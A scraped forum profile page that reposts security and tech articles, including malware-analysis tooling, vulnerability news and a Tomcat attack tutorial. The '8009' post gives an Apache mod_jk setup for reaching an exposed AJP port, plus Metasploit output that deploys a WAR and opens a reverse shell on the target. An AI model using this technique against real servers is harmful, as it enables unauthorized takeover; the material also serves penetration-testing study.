-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
Un fix rapid e deja disponibil. apt-get update/yum update si ce mai vreti voi.
-
########################################################################## ################################# Androguard ############################# ########################################################################## ################### http://code.google.com/p/androguard ################## ######################## dev (at) androguard.re ########################## ########################################################################## 1 -] About Androguard (Android Guard) is primarily a tool written in full python to play with : - DEX, ODEX - APK - Android's binary xml 2 -] Usage You need to follow the following information to install dependencies for androguard : Installation - androguard - How to install Androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting You must go to the website to see more example : Usage - androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 2.1 --] API 2.1.1 --] Instructions http://code.google.com/p/androguard/wiki/Instructions 2.2 --] Demos see the source codes in the directory 'demos' 2.3 --] Tools Usage - androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 2.4 --] Disassembler http://code.google.com/p/androguard/wiki/Disassembler 2.5 --] Analysis http://code.google.com/p/androguard/wiki/Analysis 2.6 --] Visualization Visualization - androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 2.7 --] Similarities, Diffing, plagiarism/rip-off indicator http://code.google.com/p/androguard/wiki/Similarity http://code.google.com/p/androguard/wiki/DetectingApplications 2.8 --] Open Source database of android malwares DatabaseAndroidMalwares - androguard - Open Source database of android malware (links + signatures) - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 2.9 --] Decompiler 2.10 --] Reverse RE - androguard - Reverse Engineering Tutorial of Android Apps - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 3 -] Roadmap/Issues RoadMap - androguard - Features and roadmap - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting Issues - androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 4 -] Authors: Androguard Team Androguard + tools: Anthony Desnos <desnos at t0t0.fr> DAD (DAD is A Decompiler): Geoffroy Gueguen <geoffroy dot gueguen at gmail dot com> 5 -] Contributors Craig Smith <agent dot craig at gmail dot com>: 64 bits patch + magic tricks 6 -] Licenses 6.1 --] Androguard Copyright © 2012, Anthony Desnos <desnos at t0t0.fr> All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS-IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 6.2 -] DAD Copyright © 2012, Geoffroy Gueguen <geoffroy.gueguen@gmail.com> All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS-IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Sursa: https://github.com/androguard/androguard
-
Avira – Critical CSRF flaw Vulnerability puts millions users at risk by Pierluigi Paganini on September 20th, 2014 Egyptian bug hunter discovered that Avira Website is affected by CSRF flaw that allows attackers to hijack users’ accounts and access to their online backup. What do you think about if tell you that an antivirus could represent a menace for your system? Antivirus like any other kind of software could be exploited by threat actors to compromise the machine as already explained my previous post. The popular antivirus software Avira that includes a Secure Backup service is vulnerable to a critical web application vulnerability that could allow an attacker to take over the user’s account. The Egyptian 16 year-old expert Mazen Gamal reported to The Hacker News that the Avira Website is affected by a CSRF (Cross-site request forgery) vulnerability that allows an attacker to hijack users’ accounts and access to their online secure cloud backup files. The CSRF vulnerability potentially puts millions of Avira users’ account at risk. CSRF allows an end user to execute unwanted actions on a web application once he is authenticated, in a typical attack scheme attacker sends a link via email or through a social media platform, or share a specially crafted HTML exploit page to trick the victim into executing actions of the attacker’s choosing. In this specific case an attacker could use CSRF exploit to trick a victim into accessing a malicious link that contains requests which will replace victim’s email ID on Avira account with attacker’s email ID. This this CSRF attack the victim’s account could be easily compromised, by replacing the email address the attacker can easily reset the password of the victim’s account running the forget password procedure, bacause Avira will send the password reset link to attacker’s email ID instead of the victim’s ID. Once gained the access to the victim’s account the attacker would be able to retrieve its online backup, which include files the user has stored on the Online backup Software (https://dav.backup.avira.com/). “I found a CSRF vulnerability in Avira can lead me to full account takeover of any Avira user account,” Gamal said via an email to The Hacker News. “The impact of the account takeover allowed me to Open the Backup files of the victim and also view the license codes for the affected user.” Gamal also provided a Proof-of-Concept video to demonstrate its discovery. Gamal has reported the vulnerability to the Avira Security Team on August 21th, the team admitted the flaw and fixed the CSRF bug on their website, but the Secure online backup service “is still vulnerable to hackers until Avira will not offer a offline password layer for decrypting files locally.” Mazen Gamal has been recognized as an official bug hunter by Avira. Pierluigi Paganini (Security Affairs – AVIRA, CSRF) Sursa: Avira - Critical CSRF flaw Vulnerability puts millions users at risk | Security Affairs
-
Official jQuery Website Abused in Drive-by Download Attack By Eduard Kovacs on September 23, 2014 The official website for the popular JavaScript library jQuery (jquery.com) has been compromised and abused by cybercriminals to distribute information-stealing malware, RiskIQ has reported. Roughly 70 percent of the world's top 10,000 websites rely on jQuery for dynamic content, and because most jQuery users are website and systems administrators who maintain elevated privileges within their networks, it's possible that this attack is part of an operation whose goal is to compromise the systems of major organizations, RiskIQ said. "Typically, these individuals have privileged access to web properties, backend systems and other critical infrastructure. Planting malware capable of stealing credentials on devices owned by privilege accounts holders inside companies could allow attackers to silently compromise enterprise systems, similar to what happened in the infamous Target breach," James Pleger, RiskIQ Director of Research, explained in a blog post. According to the security firm, the jQuery library itself doesn't appear to be affected by the attack. However, the attackers planted an invisible iframe on the jQuery website to redirect its visitors to another site hosting the RIG exploit kit. The RIG exploit kit was recently seen in several malvertising campaigns. The exploit kit is often used to deliver banking Trojans and other information-stealing malware. Last week, Avast researchers reported spotting a RIG attack in which the Tinba banking malware was the payload. After consulting with researchers at Dell, RiskIQ determined that the malware being served in this particular attack is Andromeda, Pleger told SecurityWeek. While RIG includes exploits for several vulnerabilities, Pleger said they directly observed Microsoft Silverlight exploits being used. The redirector domain utilized in the attack (jquery-cdn[.]com) is hosted in Russia and it was registered on September 18, the day on which the attack started. Fortunately, the administrators of jQuery.com removed the malicious code, but the redirector domain is still online as of September 23. The attack affected companies in various sectors, including banking, technology and defense, Pleger said via email. While RiskIQ hasn't been able to track down all the victims of this campaign, the security firm has notified all the companies it has identified as being attacked. Sursa: Official jQuery Website Abused in Drive-by Download Attack | SecurityWeek.Com
-
How'd that malware get there? That's the question you've got to answer for every OSX malware infection. We built OSXCollector to make that easy. Quickly parse its output to get an answer. A typical infection might follow a path like: a phishing email leads to a malicious download once installed, the initial establishes persistence then it reaches out on the network and pulls down additional payloads With the output of OSXCollector we quickly correlate between browser history, startup items, downloads, and installed applications. It makes root causing an infection, collect IOCs, and get to the bottom of an infection. So what does it do? OSXCollector gathers information from plists, sqlite databases and the local filesystems to get the information for analyzing a malware infection. The output is JSON which makes it easy to process it further by other tools. Usage Tool is self contained in one script file osxcollector. Launch OSXCollector as root or it will be unable to read data from all accounts $ sudo ./osxcollector.py Before running the tool make sure that your web browsers (Safari, Chrome or Firefox) are closed. Otherwise OS X Collector will not be able to access their diagnostic files for collecting the data. Sursa: https://github.com/Yelp/osxcollector
-
Malicious Documents – PDF Analysis in 5 steps Mass mailing or targeted campaigns that use common files to host or exploit code have been and are a very popular vector of attack. In other words, a malicious PDF or MS Office document received via e-mail or opened trough a browser plug-in. In regards to malicious PDF files the security industry saw a significant increase of vulnerabilities after the second half of 2008 which might be related to Adobe Systems release of the specifications, format structure and functionality of PDF files. Most enterprise networks perimeters are protected and contain several security filters and mechanism that block threats. However a malicious PDF or MS Office document might be very successful passing trough Firewalls, Intrusion Prevention Systems, Anti-spam, Anti-virus and other security controls. By reaching the victim mailbox, this attack vector will leverage social engineering techniques to lure the user to click/open the document. Then, for example, If the user opens a PDF malicious file, it typically executes JavaScript that exploits a vulnerability when Adobe Reader parses the crafted file. This might cause the application to corrupt memory on the stack or heap causing it to run arbitrary code known as shellcode. This shellcode normally downloads and executes a malicious file from the Internet. The Internet Storm Center Handler Bojan Zdrnja wrote a good summary about one of these shellcodes. In some circumstances the vulnerability could be exploited without opening the file and just by having a malicious file on the hard drive as described by Didier Stevens. From a 100 feet view a PDF file is composed by a header , body, reference table and trailer. One key component is the body which might contains all kinds of content type objects that make parsing attractive for vulnerability researchers and exploit developers. The language is very rich and complex which means the same information can be encoded and obfuscated in many ways. For example within objects there are streams that can be used to store data of any type of size. These streams are compressed and the PDF standard supports several algorithms including ASCIIHexDecode, ASCI85Decode, LZWDecode, FlateDecode, RunLengthDecode, CCITTFaxDecode, DCTCDecode called Filters. PDF files can contain multimedia content and support JavaScript and ActionScript trough Flash objects. Usage of JavaScript is a popular vector of attack because it can be hidden in the streams using different techniques making detection harder. In case the PDF file contains JavaScript, the malicious code is used to trigger a vulnerability and to execute shellcode. All this features and capabilities are translated in a huge attack surface! From a security incident response perspective the knowledge about how to do a detailed analysis of such malicious files can be quite useful. When analyzing this kind of files an incident handler can determine the worst it can do, its capabilities and key characteristics. Furthermore it can help to be better prepared and identify future security incidents and how to contain, eradicate and recover from those threats. So which steps could an incident handler or malware analyst perform to analyze such files. In case of malicious PDF files there are 5 steps. By using REMnux distro the steps are described by Lenny Zeltser as being: Find and Extract Javascript Deobfuscate Javascript Extract the shellcode Create a shellcode executable Analyze shellcode and determine what is does. A summary of tools and techniques using REMnux to analyze malicious documents are described in the cheat sheet compiled by Lenny, Didier and others. In order to practice these skills and illustrate an introduction to the tools and techniques below is the analysis of a malicious PDF using these steps. The other day I received one of those emails that was part of a mass mailing campaign. The email contained an attachment with a malicious PDF file that took advantage of Adobe Reader Javascript engine to exploit CVE-2013-2729. This vulnerability found by Felipe Manzano exploits an integer overflow in several versions of the Adobe Reader when parsing BMP files compressed with RLE8 encoded in PDF forms. The file on Virus Total was only detected by 6 of the 55 AV engines. Let’s go through each one of the mentioned steps to find information on the malicious PDF key characteristics and its capabilities. 1st Step – Find and extract JavaScript One technique is using Didier Stevens suite of tools to analyze the content of the PDF and look for suspicious elements. One of those tools is Pdfid which can show several keywords used in PDF files that could be used to exploit vulnerabilities. The previously mentioned cheat sheet contain some of these keywords. In this case the first observations shows the PDF file contains 6 objects and 2 streams. No JavaScript mentioned but it contains /AcroForm and /XFA elements. This means the PDF file contains XFA forms which might indicate it is malicious. Then looking deeper we can use pdf-parser.py to display the contents of the 6 objects. The output was reduced for the sake of brevity but in this case the Object 2 is the /XFA element that is referencing to Object 1 which contains a stream compressed and rather suspicious. Following this indicator pdf-parser.py allows us to show the contents of an object and pass the stream trough one of the supporter filters (FlateDecode, ASCIIHexDecode, ASCII85Decode, LZWDecode and RunLengthDecode only) trough the –filter switch. The –raw switch allows to show the output in a easier way to read. The output of the command is redirected to a file. Looking at the contents of this file we get the decompressed stream. When inspecting this file you will see several lines of JavaScript that weren’t on the original PDF file. If this document is opened by a victim the /XFA keyword will execute this malicious code. Another fast method to find if the PDF file contains JavaScript and other malicious elements is to use the peepdf.py tool written by Jose Miguel Esparza. Peepdf is a tool to analyze PDF files, helping to show objects/streams, encode/decode streams, modify all of them, obtain different versions, show and modify metadata, execution of Javascript and shellcodes. When running the malicious PDF file against the last version of the tool it can show very useful information about the PDF structure, its contents and even detect which vulnerability it triggers in case it has a signature for it. 2nd Step – Deobfuscate Javascript The second step is to deobfuscate the JavaScript. JavaScript can contain several layers of obfuscation. in this case there was quite some manual cleanup in the extracted code just to get the code isolated. The object.raw contained 4 JavaScript elements between <script xxxx contentType=”application/x-javascript”> tags and 1 image in base64 format in <image> tag. This JavaScript code between tags needs to be extracted and place into a separated file. The same can be done for the chunk of base64 data, when decoded will produce a 67Mb BMP file. The JavaScript in this case was rather cryptic but there are tools and techniques that help do the job in order to interpret and execute the code. In this case I used another tool called js-didier.pl which is a Didier version of the JavaScript interpreter SpiderMonkey. It is essentially a JavaScript interpreter without the browser plugins that you can run from the command line. This allows to run and analyze malicious JavaScript in a safe and controlled manner. The js-didier tool, just like SpiderMonkey, will execute the code and prints the result into files named eval.00x.log. I got some errors on one of the variables due to the manual cleanup but was enough to produce several eval log files with interesting results. 3rd Step – Extract the shellcode The third step is to extract the shellcode from the deobfuscated JavaScript. In this case the eval.005.log file contained the deobfuscated JavaScript. The file among other things contains 2 variables encoded as Unicode strings. This is one trick used to hide or obfuscate shellcode. Typically you find shellcode in JavaScript encoded in this way. These Unicode encoded strings need to be converted into binary. To perform this isolate the Unicode encoded strings into a separated file and convert it the Unicode (\u) to hex (\x) notation. To do this you need using a series of Perl regular expressions using a Remnux script called unicode2hex-escaped. The resulting file will contain the shellcode in a hex format (“\xeb\x06\x00\x00..”) that will be used in the next step to convert it into a binary 4th Step – Create a shellcode executable Next with the shellcode encoded in hexadecimal format we can produce a Windows binary that runs the shellcode. This is achieved using a script called shellcode2exe.py written by Mario Vilas and later tweaked by Anand Sastry. As Lenny states ” The shellcode2exe.py script accepts shellcode encoded as a string or as raw binary data, and produces an executable that can run that shellcode. You load the resulting executable file into a debugger to examine its. This approach is useful for analyzing shellcode that’s difficult to understand without stepping through it with a debugger.” 5th Step – Analyze shellcode and determine what is does. Final step is to determine what the shellcode does. To analyze the shellcode you could use a dissasembler or a debugger. In this case the a static analysis of the shellcode using the strings command shows several API calls used by the shellcode. Further also shows a URL pointing to an executable that will be downloaded if this shellcode gets executed We now have a strong IOC that can be used to take additional steps in order to hunt for evil and defend the networks. This URL can be used as evidence and to identify if machines have been compromised and attempted to download the malicious executable. At the time of this analysis the file was no longer there but its known to be a variant of the Game Over Zeus malware. The steps followed are manual but with practice they are repeatable. They just represent a short introduction to the multifaceted world of analyzing malicious documents. Many other techniques and tools exist and much deeper analysis can be done. The focus was to demonstrate the 5 Steps that can be used as a framework to discover indicators of compromise that will reveal machines that have been compromised by the same bad guys. However using these 5 steps many other questions could be answered. Using the mentioned and other tools and techniques within the 5 steps we can have a better practical understanding on how malicious documents work and which methods are used by Evi. Two great resource for this type of analysis is the Malware Analyst’s Cookbook : Tools and Techniques for Fighting Malicious Code book from Michael Ligh and the SANS FOR610: Reverse-Engineering Malware: Malware Analysis Tools and Technique. Sursa: Malicious Documents – PDF Analysis in 5 steps | Count Upon Security
-
The SSD Endurance Experiment: Only two remain after 1.5PB Another one bites the dust by Geoff Gasior — 11:35 AM on September 19, 2014 You won't believe how much data can be written to modern SSDs. No, seriously. Our ongoing SSD Endurance Experiment has demonstrated that some consumer-grade drives can withstand over a petabyte of writes before burning out. That's a hyperbole-worthy total for a class of products typically rated to survive only a few hundred terabytes at most. Our experiment began with the Corsair Neutron GTX 240GB, Intel 335 Series 240GB, Samsung 840 Series 250GB, and Samsung 840 Pro 256GB, plus two Kingston HyperX 3K 240GB drives. They all surpassed their endurance specifications, but the 335 Series, 840 Series, and one of the HyperX drives failed to reach the petabyte mark. The remainder pressed on toward 1.5PB, and two of them made it relatively unscathed. That journey claimed one more victim, though—and you won't believe which one. Seriously, you won't. But I'll stop now. To celebrate the latest milestone, we've checked the health of the survivors, put them through another data retention test, and compiled performance results from the last 500TB. We've also taken a closer look at the last throes of our latest casualty. If you're unfamiliar with our endurance experiment, this introductory article is recommended reading. It provides far more details on our subjects, methods, and test rigs than we'll revisit today. Here are the basics: SSDs are based on NAND flash memory with limited endurance, so we're writing an unrelenting stream of data to a stack of drives to see what happens. We pause every 100TB to collect health and performance data, which we then turn into stunningly beautiful graphs. Ahem. Understanding NAND's limited lifespan requires some familiarity with how NAND works. This non-volatile memory stores data by trapping electrons inside miniscule cells built with process geometries as small as 16 nm. The cells are walled off by an insulating oxide layer, but applying voltage causes electrons to tunnel through that barrier. Electrons are drawn into the cell when data is written and out of it when data is erased. The catch—and there always is one—is that the tunneling process erodes the insulator's ability to hold electrons within the cell. Stray electrons also get caught in the oxide layer, generating a baseline negative charge that narrows the voltage range available to represent data. The narrower that range gets, the more difficult it becomes to write reliably. Cells eventually wear to the point that they're no longer viable, after which they're retired and replaced with spare flash from the SSD's overprovisioned area. Since NAND wear is tied to the voltage range used to define data, it's highly sensitive to the bit density of the cells. Three-bit TLC NAND must differentiate between eight possible values within that limited range, while its two-bit MLC counterpart only has to contend with four values. TLC-based SSDs typically have lower endurance as a result. As we've learned in the experiment thus far, flash wear causes SSDs to perish in different ways. The Intel 335 Series is designed to check out voluntarily after a predetermined number of writes. That drive dutifully bricked itself after 750TB, even though its flash was mostly intact at the time. The first HyperX failed a little earlier, at 728TB, under much different conditions. It suffering rash of reallocated sectors, programming failures, and erase failures before its ultimate demise. Counter-intuitively, the TLC-based Samsung 840 Series outlasted those MLC casualties to write over 900TB before failing suddenly. But its reallocated sectors started piling up after just a few hundred terabytes of writes, confirming TLC's more fragile nature. The 840 Series also suffered hundreds of uncorrectable errors split between an initial spate at 300TB and second accumulation near the end of the road. So, what about the latest death? Much to our surprise, the Neutron GTX failed next. It had logged only three reallocated sectors through 1.1PB of writes, but SMART warnings appeared soon after, cautioning that the raw read error rate had exceeded the acceptable threshold. The drive still made it to 1.2PB and through our usual round of performance benchmarks. However, its SMART attributes showed a huge spike in reallocated sectors: Over the last 100TB, the Neutron compensated for over 3400 sector failures. And that was it. When we readied the SSDs for the next leg, our test rig refused to boot with the Neutron connected. The same thing happened with a couple of other machines, and hot-plugging the drive into a running system didn't help. Although the Neutron was detected, the Windows disk manager stalled when we tried to access it. Despite the early warnings of impending doom, the Neutron's exit didn't go entirely by the book. The drive is supposed to keep writing until its flash reserves are used up, after which it should slip into a persistent read-only state to preserve user data. As far as we can tell, our sample never made it to read-only mode. It was partitioned and loaded with 10GB of data before the power cycle that rendered the drive unresponsive, and that partition and data remain inaccessible. We've asked Corsair to clarify the Neutron GTX's sector size and how much of the overprovisioned area is available to replace retired flash. Those details should give us a better sense of whether the drive ran out of spare NAND or was struck down by something else. For what it's worth, the other SMART attributes suggest the Neutron may have had some flash in reserve. The SMART data has two values for reallocated sectors: one that counts up from zero and another that ticks down from 256. The latter still hadn't bottomed out after 1.2PB, and neither had the life-left estimate. Hmmm. Although the graph shows the raw read error rate plummeting toward the end, the depiction isn't entirely accurate. That attribute was already at its lowest value after 1.108PB of writes, which is when we noticed the first SMART error. We may need to grab SMART info more regularly in future endurance tests. Now that we've tended to the dead, it's time to check in on the living... Articol complet: The SSD Endurance Experiment: Only two remain after 1.5PB - The Tech Report - Page 1
-
An Analysis of the CAs trusted by iOS 8.0 Posted on September 22, 2014 by Karl Kornel iOS 8.0 ships with a number of trusted certificates (also known as “root certificates” or “certificate authorities”), which iOS implicitly trusts. The root certificates are used to trust intermediate certificates, and the intermediate certificates are used to trust web site certificates. When you go to a web site using HTTPS, or an app makes a secure connection to something on the Internet (like your mail server), the web site (or mail server, or whatever) gives iOS its certificate, and any intermediate certificates needed to make a “chain of trust” back to one of the roots. Using the fun mathematical property of transitivity, iOS will trust a web site’s certificate because it trusts a root certificate. iOS 8.0 includes two hundred twenty-two trusted certificates. In this post, I’m going to take a look at these 222 certificates. First I’m going to look at them in the aggregate, giving CA counts by key size and by hashing algorithm. Afterwards, I’m going to look at who owns these trusted roots. Perl is Awesome Before I go on, a quick shootout: Perl is awesome! I used a Perl script to parse Apple’s list, and to generate the numbers below. If you want the script, here it is: The quick-and-dirty Perl script (signature) The list of CAs (signature) Key Sizes The root certificates use either RSA or ECC for their keys. Here’s how the numbers break down: 4096-bit RSA: 44 CAs 2048-bit RSA: 138 CAs 1024-bit RSA: 27 CAs 384-bit ECC: 12 CAs 256-bit ECC: 1 CA On the RSA side, the numbers don’t surprise me too much. 1024-bit RSA is fading away, and a fair number of CAs moved to 4096-bit RSA keys, rather than move to ECC (or before ECC started to become prevalent for certificates). Even though RSA has the supermajority, ECC has gotten a foothold in the land of the CA, and that’s good, but I am concerned by the algorithm choices. The 256-bit ECC curve that one CA is using is identified as prime256v1. The 384-bit ECC curve that twelve CAs are using is secp384r1, also known as ansip384r1, or as P-384, the bigger brother to the infamous P-256. Neither of these curves are trustworthy, according to Safecurves. I would not be surprised if the number of ECC keys stays stable, and the number of RSA 4096-bit keys goes up. Most (if not all) of the widely-supported ECC algorithms (in web browsers and servers) are of the P-XXX variety. The safer route (for now, anyway) is to move up to 4096-bit RSA, while waiting (and advocating) for the inclusion of more trusted curves into web browsers and servers. Signature Hashes When we look as the hashing algorithms used to sign these root certificates, SHA is the order of the day: SHA-512: 1 CA SHA-384: 17 CAs (including 12 of the CAs using ECC keys) SHA-256: 42 CAs (including 1 of the CAs using ECC keys) SHA-1: 149 CAs MD-5: 10 CAs MD-2: 3 CAs First, some clarification: SHA-1 is a single algorithm. SHA-2 is a collection of algorithms, among which are SHA-256, SHA-384, and SHA-512. There are also other members of SHA-2, but they aren’t used here, so I’m ignoring them! Again we see the slow move away from SHA-1, and that’s good, but what really surprised me was the number of MD-5 certificates, and *gasp* there are still three MD-2 CAs? Really? Looking at MD-5, both Netlock and Thawte own three each, expiring in 2019 (for Netlock) and 2020 (for Thawte). GTE owns one (expiring in 2018), Equifax owns two (expiring in 2020), and one of them (owned by Globalsign) expired this January. Those all pale in comparison to the three MD-2 CAs, all owned by Verisign (the original “Class 1,2,3 Public Primary Certification Authority” CAs) and all expiring in 2028. Hey, crypto people, if you thought MD-2 was dead, you were wrong! This inclusion really surprises me: If you try to load your own MD-5 root certificate into iOS, it will not be trusted. And yet, iOS 8.0 ships with 13 CAs that use MD-5 (or older) algorithms. Update: As has been noted on Twitter, root certificate signatures are typically not validated by clients (browsers, OSes, etc.). Intermediates and lower certificate signatures are validated, but the root cert signatures are not. Certificate Owners Companies It is no surprise that the vast majority of CAs in iOS are owned by for-profit corporations. What interested me is just how many of those corporations seem to go a little overboard. The following vendors have more than 3 CAs in iOS 8.0: AC Camerfirma SA: 4 CAs Apple: 4 CAs Comodo: 4 CAs Digicert: 8 CAs Entrust: 5 CAs Geotrust: 4 CAs Globalsign: 6 CAs Netlock Kft: 5 CAs Symantec: 6 CAs TC Trustcenter GMBH: 6 CAs Thawte: 12 CAs The Usertrust Network: 5 CAs Verisign: 17 CAs All told, Symantec owns thirty-five CAs, thanks to Verisign’s purchase of Thawte, and Symantec’s purchase of Verisign. I don’t hold that against Symantec, though: Most of the CAs were issued before the purchase, and it’s too much trouble for all of their customers to switch over to Symantec roots. Even so, I really start to wonder: How many certificate authorities does one company actually need? Governments There are a number of governments whose CAs are included in iOS 8.0: China: 1 CA, via the China Internet Network Information Center Hong Kong: 1 CA, via the Hongkong Post e-Cert. Japan: 3 CAs, via GPKI and the Ministry of Public Management, Home Affairs, Posts, and Telecommunications (MPHPT) Netherlands: 3 CAs, via PKIoverheid Taiwan: 1 CA, via the Government Root Certification Authority Turkey: 1 CA, via the Scientific and Technological Research Council of Turkey United States: 5 CAs, via the Department of Defense Those were just the countries whose names I was able to pick out. When it comes to web sites, it looks like there’s no need to crack the encryption, and you probably don’t even need an inside line to Verisign! You can just issue your own faux-Microsoft cert (or faux-Google, or faux-Apple, or …) using one of your own governmental CAs, which iOS already recognizes. Unfortunately, I can not see any way (in Safari on iOS 8.0) to get information on the certificate chain for a web site. In other words, I can’t tell if the certificate for secure1.store.apple.com was issued by VeriSign, or if it was issued by the US Department of Defense. Safari does show the green URL bar and company name for EV certificates, but I have no way of knowing ahead of time that Apple uses an EV certificate for their sites. Final Thoughts First of all, it’s good that Apple has posted the list, and I do believe it to be a complete list. That said, I do wish there was a way in iOS Safari for me to see the details of the site’s certificate, and the chain from the certificate up to the root. Maybe this is something that could be implemented as an extension? The security-concious (or maybe security-paranoid?) will take note of the CAs that are using questionable ECC curves, and those CAs that are using MD-2 or MD-5 signature hashes. Other people will also take note of the countries whose governments have their CAs in iOS 8.0, making it so much easier for them to impersonate web sites of their choosing. There is no way to disable any of the root CAs that comes with iOS, so it is very much a take-it-or-leave-it situation. I wonder, is Android the same way, or does Android allow you to uninstall or disable CAs that you don’t like? With all the work that Apple does to secure iOS devices, that makes me trust Apple enough to take it. I’m going to continue using my iPhone 5, with iOS 8.0. Sursa: An Analysis of the CAs trusted by iOS 8.0 | Karl's Notes
-
Run Android APKs on Chrome OS, OS X, Linux and Windows. Now supports OS X, Linux and Windows See the custrom ARChon runtime guide to run apps on other operating systems besides Chrome OS. Quick Demo for Chrome OS Download an official app, such as Evernote, from the Chrome Web Store. Then download this open source game: 2048.APK Game by Uberspot and load it as an unpacked extension. Press "Launch", ignore warnings. Sursa: https://github.com/vladikoff/chromeos-apk
-
8009, the forgotten Tomcat port We all know about exploiting Tomcat using WAR files. That usually involves accessing the Tomcat manager interface on the Tomcat HTTP(S) port. The fun and forgotten thing is, that you can also access that manager interface on port 8009. This the port that by default handles the AJP (Apache JServ Protocol) protocol: What is JK (or AJP)? AJP is a wire protocol. It an optimized version of the HTTP protocol to allow a standalone web server such as Apache to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static content. The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat related content. Also interesting: The ajp13 protocol is packet-oriented. A binary format was presumably chosen over the more readable plain text for reasons of performance. The web server communicates with the servlet container over TCP connections. To cut down on the expensive process of socket creation, the web server will attempt to maintain persistent TCP connections to the servlet container, and to reuse a connection for multiple request/response cycles It’s not often that you encounter port 8009 open and port 8080,8180,8443 or 80 closed but it happens. In which case it would be nice to use existing tools like metasploit to still pwn it right? As stated in one of the quotes you can (ab)use Apache to proxy the requests to Tomcat port 8009. In the references you will find a nice guide on how to do that (read it first), what follows is just an overview of the commands I used on my own machine. I omitted some of the original instruction since they didn’t seem to be necessary. (apache must already be installed) sudo apt-get install libapach2-mod-jk sudo vim /etc/apache2/mods-available/jk.conf # Where to find workers.properties # Update this path to match your conf directory location JkWorkersFile /etc/apache2/jk_workers.properties # Where to put jk logs # Update this path to match your logs directory location JkLogFile /var/log/apache2/mod_jk.log # Set the jk log level [debug/error/info] JkLogLevel info # Select the log format JkLogStampFormat "[%a %b %d %H:%M:%S %Y]" # JkOptions indicate to send SSL KEY SIZE, JkOptions +ForwardKeySize +ForwardURICompat -ForwardDirectories # JkRequestLogFormat set the request format JkRequestLogFormat "%w %V %T" # Shm log file JkShmFile /var/log/apache2/jk-runtime-status sudo ln -s /etc/apache2/mods-available/jk.conf /etc/apache2/mods-enabled/jk.conf sudo vim /etc/apache2/jk_workers.properties # Define 1 real worker named ajp13 worker.list=ajp13 # Set properties for worker named ajp13 to use ajp13 protocol, # and run on port 8009 worker.ajp13.type=ajp13 worker.ajp13.host=localhost worker.ajp13.port=8009 worker.ajp13.lbfactor=50 worker.ajp13.cachesize=10 worker.ajp13.cache_timeout=600 worker.ajp13.socket_keepalive=1 worker.ajp13.socket_timeout=300 sudo vim /etc/apache2/sites-enabled/000-default JkMount /* ajp13 JkMount /manager/ ajp13 JkMount /manager/* ajp13 JkMount /host-manager/ ajp13 JkMount /host-manager/* ajp13 sudo a2enmod proxy_ajp sudo a2enmod proxy_http sudo /etc/init.d/apache2 restart Don’t forget to adjust worker.ajp13.host to the correct host. A nice side effect of using this setup is that you might thwart IDS/IPS systems in place since the AJP protocol is somewhat binary, but I haven’t verified this. Now you can just point your regular metasploit tomcat exploit to 127.0.0.1:80 and take over that system. Here is the metasploit output also: msf exploit(tomcat_mgr_deploy) > show options Module options (exploit/multi/http/tomcat_mgr_deploy): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD tomcat no The password for the specified username PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no Use a proxy chain RHOST localhost yes The target address RPORT 80 yes The target port USERNAME tomcat no The username to authenticate as VHOST no HTTP server virtual host Payload options (linux/x86/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.195.156 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(tomcat_mgr_deploy) > exploit [*] Started reverse handler on 192.168.195.156:4444 [*] Attempting to automatically select a target... [*] Automatically selected target "Linux x86" [*] Uploading 1648 bytes as XWouWv7gyqklF.war ... [*] Executing /XWouWv7gyqklF/TlYqV18SeuKgbYgmHxojQm2n.jsp... [*] Sending stage (36 bytes) to 192.168.195.155 [*] Undeploying XWouWv7gyqklF ... [*] Command shell session 1 opened (192.168.195.156:4444 -> 192.168.195.155:39401) id uid=115(tomcat6) gid=123(tomcat6) groups=123(tomcat6) References FAQ/Connectors - Tomcat Wiki AJPv13 Rajeev Sharma: Configure mod_jk with Apache 2.2 in Ubuntu Sursa: https://diablohorn.wordpress.com/2011/10/19/8009-the-forgotten-tomcat-port/
-
Fedora 21 Alpha Is Out – Screenshot Tour The Fedora 21 Alpha can be downloaded from Softpedia By Silviu Stahie on September 24th, 2014 07:36 GMT The Fedora Project has announced that the first Alpha release for Fedora 21 is now available for download and testing, marking the beginning of a new journey for this famous distribution. The Fedora development team has been trying to get this Alpha release out the door for quite some time and they have been confronted with all sorts of problems that delayed the release. Now it's out and we get to test it properly. Users shouldn't get their hopes up for the final release of Fedora. The developers don't have the best track record at keeping a tight schedule for the upcoming builds, so it's very likely that the final iteration will also be pushed back.It's a new Fedora Fedora 21 is the first distribution in the series that doesn't have a code name. The previous release was called "Heisenbug." Not many users liked it, so they dropped the naming process entirely. Besides this simple move, the developers have also split the project into Fedora Server, Fedora Cloud, and Fedora Workstation. "The Alpha release contains all the exciting features of Fedora 21's products in a form that anyone can help test. This testing, guided by the Fedora QA team, helps us target and identify bugs. When these bugs are fixed, we make a Beta release available. A Beta release is code-complete and bears a very strong resemblance to the third and final release. The 